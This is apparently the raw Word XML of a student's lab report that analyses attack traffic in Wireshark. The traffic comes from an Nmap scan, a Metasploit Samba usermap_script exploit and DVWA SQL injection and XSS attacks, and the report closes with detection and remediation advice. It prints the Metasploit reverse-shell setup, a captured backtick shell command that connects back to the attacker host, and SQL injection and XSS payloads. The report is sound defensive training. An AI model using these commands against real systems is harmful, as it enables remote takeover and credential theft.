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Project 8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Traffic Analysis with Wireshark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Packet-level capture and analysis of reconnaissance, exploitation, and web application attack traffic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="16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Vijay S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Lab Environment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VMware Workstation, VMnet1 host-only network (192.168.100.0/24)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Wireshark, Nmap, Metasploit Framework, DVWA, Kali Linux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Reconnaissance traffic, remote exploitation traffic, and web application attack traffic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reachvijays20@gmail.com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github.com/JacobVijay26/Vijay_cybersecurity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60" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This project captures and analyzes network traffic across three distinct attack scenarios against lab targets, using Wireshark as the primary analysis tool. Rather than treating packet capture as a black box that simply confirms an attack worked, this project focuses on reading the actual bytes on the wire — identifying attacker fingerprints, extracting cleartext credentials, and reconstructing exploit payloads directly from packet data, the same way a SOC analyst or incident responder would approach a real traffic capture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Three separate capture files were generated and analyzed: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Nmap reconnaissance scan against Metasploitable2 — port scanning fingerprint identification and service banner disclosure.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Samba usermap_script remote exploit against Metasploitable2 — full reconstruction of the malicious command executed via the vulnerability, captured directly from the wire.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DVWA web application attacks (SQL Injection and Reflected XSS) — cleartext credential leakage and unsanitized payload reflection, both visible in raw HTTP traffic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Across all three captures, a consistent theme emerges: none of the observed traffic used encryption. Every attack technique, every leaked credential, and every exploit payload was fully visible to anyone capturing traffic on the network — not just the active attacker. This is the practical argument for TLS everywhere and for network-level monitoring as a detection layer independent of the application itself.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Lab Topology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">All traffic was captured on Kali Linux's eth0 interface, positioned on the same host-only VMware network segment (VMnet1, 192.168.100.0/24) as both target machines, giving full visibility of all traffic to and from each target without requiring a network tap or span port.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Kali Linux (attacker / capture host)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192.168.100.129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Metasploitable2 (recon + exploitation target)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192.168.100.128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DVWA-Ubuntu (web application target)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192.168.100.30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Traffic capture tool: Wireshark, capturing on interface eth0 for the full duration of each scenario, then saved as a separate .pcapng file per scenario for isolated analysis.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Scenario 1 — Nmap Reconnaissance Scan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CAPTURE FILE: 02_nmap_recon.pcapng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3.1 Attack Command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
        <w:ind w:left="200" w:righ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nmap -sV -O 192.168.100.128</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A service-version detection and OS fingerprinting scan was run against Metasploitable2 while Wireshark captured all traffic on Kali's eth0 interface.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3.2 Nmap Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The scan identified 23 open ports across a wide range of services, several with immediately notable weaknesses (outdated vsftpd, Samba, and UnrealIRCd versions):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3.1 — Nmap scan results showing 23 open ports and service/version fingerprinting against Metasploitable2, including outdated and vulnerable software versions.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3.3 Identifying the Scan Pattern in Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Filtering for SYN packets without the ACK flag isolates Nmap's initial connection probes, revealing the scanning pattern directly at the packet level:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
        <w:ind w:left="200" w:righ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tcp.flags.syn==1 and tcp.flags.ack==0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686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3.2 — SYN probe packets showing the scanner fingerprint: a single reused source port (43094) targeting a different destination port on nearly every packet, all within a fraction of a second — a pattern no normal application traffic produces.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3.4 Confirming Open Ports via SYN-ACK Responses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Filtering for the target's SYN-ACK responses shows exactly which ports replied as open, providing packet-level confirmation of Nmap's port table:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
        <w:ind w:left="200" w:righ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tcp.flags.syn==1 and tcp.flags.ack==1 and ip.src==192.168.100.128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5622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3.3 — 291 SYN-ACK responses (5.8% of total capture) confirming each open port, matching Nmap's reported service list.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3.5 Service Banner Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Following the TCP stream on port 21 (FTP) reveals the exact version banner sent in cleartext before any authentication, plus an unexpected internal error string leaking to the client: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7527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3.4 — FTP banner "220 (vsFTPd 2.3.4)" disclosed with no authentication required, followed by an internal server error ("500 OOPS: vsf_sysutil_recv_peek: no data") leaking implementation detail to an unauthenticated client.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3.6 Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unauthenticated service banner grabbing allows any network-adjacent party to fingerprint exact software versions without triggering authentication logs, enabling precise vulnerability targeting (e.g. the well-known vsftpd 2.3.4 backdoor) before any exploitation attempt is made.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Scenario 2 — Samba Remote Exploitation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CAPTURE FILE: 03_samba_exploit.pcapng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4.1 Exploit Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Samba usermap_script vulnerability was exploited via Metasploit, granting a remote root shell on Metasploitable2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
        <w:ind w:left="200" w:righ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use exploit/multi/samba/usermap_script</w:t>
      </w:r>
      <w:r>
        <w:br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set RHOSTS 192.168.100.128</w:t>
      </w:r>
      <w:r>
        <w:br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set PAYLOAD cmd/unix/reverse</w:t>
      </w:r>
      <w:r>
        <w:br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set LHOST 192.168.100.129</w:t>
      </w:r>
      <w:r>
        <w:br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exploit</w:t>
      </w:r>
      <w:r>
        <w:br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[*] Command shell session 1 opened (192.168.100.129:4444 -&gt; 192.168.100.128:56279)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9241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4.1 — Metasploit console confirming a successful command shell session opened against Metasploitable2, subsequently confirmed with whoami returning root.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4.2 Locating the Exploit in the Capture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Filtering for SMB/NetBIOS traffic isolates the exploit's network footprint, and Wireshark's protocol dissector surfaces the malicious payload directly in the packet list without any manual decoding:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
        <w:ind w:left="200" w:righ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smb or nbss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6384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4.2 — Packet 263, "Session Setup AndX Request, User: .\/=`nohup sh -c '(sleep 43..." — the malicious command disguised as a username, visible directly in Wireshark's Info column.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4.3 Full Payload Reconstruction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Expanding the SMB Account field and reading the hex/ASCII pane reveals the complete command sent to the target, confirming the exact mechanism of exploitation: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5812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4.3 — Full malicious "Account" field: /=`nohup sh -c '(sleep 4310|telnet 192.168.100.129 4...)' — the usermap_script vulnerability executes the backtick-wrapped shell command instead of treating it as a literal username.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Notably, the subsequent Session Setup AndX Response returns STATUS_LOGON_FAILURE — expected and irrelevant to the attack's success, since the malicious command already executes the moment Samba's vulnerable script processes the crafted "username," regardless of whether the fabricated login itself succeeds.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4.4 Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This vulnerability allows unauthenticated remote code execution with no valid credentials required. The entire attack — from crafted request to shell access — travels as a single unencrypted SMB packet, fully visible and reconstructable from a passive traffic capture, which is exactly how this analysis was performed.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Scenario 3 — DVWA Web Application Attacks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CAPTURE FILE: 04_dvwa_web_attacks.pcapng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5.1 Identifying Attack Traffic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Filtering for HTTP requests shows the entire attack sequence readable directly in the request list — both SQL Injection and XSS payloads are visible in URL-encoded form without opening a single packet:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
        <w:ind w:left="200" w:righ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http.request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7813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5.1 — HTTP request log showing the SQL Injection payloads (id=1%27+OR+%271%27%3D%271, id=1%27+UNION+SELECT+user...) and the XSS payload (name=%3Cscript%3Ealert...) plainly visible in the URL of each GET request.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5.2 SQL Injection — Credential Leak in Cleartext</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Following the HTTP stream for the successful UNION-based injection request shows the complete server response, including the full leaked credential table, exactly as it traveled over the network with no encryption:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
        <w:ind w:left="200" w:righ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GET /dvwa/vulnerabilities/sqli/?id=1%27+UNION+SELECT+user%2C+password+FROM+users--+-&amp;Submit=Submit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27813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5.2 — Raw HTTP response body containing all five DVWA user credential pairs (username + MD5 password hash) in plaintext, extracted purely by reading the captured network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">These are the same five credential hashes recovered independently via SQL Injection and Blind SQL Injection in Project 7 — this capture provides a third, fully independent confirmation at the network layer, proving the same data exposure is visible to anyone monitoring the wire, not just an active attacker submitting queries.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5.3 Reflected XSS — Unsanitized Payload Reflection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The XSS request/response pair shows both the injected payload and a notable response header, then the unsanitized reflection itself in the response body:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
        <w:ind w:left="200" w:right="2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GET /dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E</w:t>
      </w:r>
      <w:r>
        <w:br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X-XSS-Protection: 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The X-XSS-Protection: 0 response header is a deliberate signal from the server telling the browser to disable its (now-deprecated) built-in reflected-XSS filter — DVWA at Low security explicitly turns off even legacy browser-side protections. Scrolling further into the response body shows the actual reflection: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30670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5.3 — Server response body containing &lt;pre&gt;Hello &lt;script&gt;alert('xss')&lt;/script&gt;&lt;/pre&gt; — the injected payload reflected back with zero encoding or sanitization, confirming the browser executes it as live code rather than displaying it as text.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5.4 Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Both vulnerabilities transmit their full attack payload and impact in plaintext HTTP. The SQL Injection finding demonstrates complete credential table exposure visible to network-level monitoring; the XSS finding demonstrates that even a deprecated defense-in-depth browser header is actively disabled, removing a layer of protection that would otherwise exist by default.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Findings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50"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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27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MITRE ATT&amp;CK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Nmap Reconnaissance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fingerprint + unauthenticated service banner disclosure (vsFTPd 2.3.4)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T1595 — Active Scanning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Samba Exploitation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Unauthenticated remote code execution via usermap_script, full payload reconstructed from capture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T1210 — Exploitation of Remote Services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DVWA SQL Injection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credential table leaked in cleartext HTTP, cross-validated with Project 7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T1190 — Exploit Public-Facing Application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DVWA Reflected XSS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Unsanitized payload reflection with browser XSS protection explicitly disabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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T1189 — Drive-by Compromise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Cross-Scenario Remediation Themes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Encrypt all traffic in transit (TLS for HTTP, SSH-tunneled or VPN-wrapped internal service traffic) — every finding in this report was directly readable specifically because the underlying protocol was unencrypted.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Patch or disable legacy/vulnerable service versions identified via banner disclosure (vsftpd, Samba) before they can be fingerprinted and targeted.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network-level monitoring (IDS/IPS, or a SIEM ingesting network flow data) capable of detecting scanning patterns and known exploit signatures independent of host-level logging.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parameterized queries and output encoding at the application layer — the DVWA findings show that once traffic is captured, cleartext HTTP makes both the attack and its full impact trivially visible to any observer, not just the active attacker.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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This project demonstrates that packet capture analysis provides an independent, network-level view of attacks that complements application-level and host-level findings from earlier projects. Every technique documented here — reconnaissance, remote exploitation, and web application attacks — left a clear, reconstructable fingerprint in the raw traffic, and in every case the full impact (leaked credentials, executed commands, reflected payloads) was visible to passive network monitoring alone. This reinforces a core detection-engineering principle: defense should never rely on a single layer, since network-level visibility alone was sufficient to fully reconstruct every attack in this report from scratch.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Project 8 — Network Traffic Analysis with Wireshark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2530cbc7b37804200549e8654bc26dfba3e8d0.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/5fd4c0077ebe5667d21c22096344c61cb6fc15c3.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/c9e6970d8b858f9d4763c3fbc49b85620c09a277.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8a694352c1e9d8ff2ba333852d4a31be397be1a1.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/be5cd3f0043b05d9f687e33fe5e9d219d0182349.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/4402900dece98aee517506d4c0425a771beeae61.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/7f4d3b174dde4ab9f300b889e5d3e02fac82d413.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/2725eac1faf84d2f89dc179d7bc713d68075ca3e.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/532d6dfe056fd5ea1a2a67ea2211626d61e99fff.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/4997cc564af3e62e991ac579a6148a716e94379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2026-07-22T12:57:29.248Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-22T12:57:29.260Z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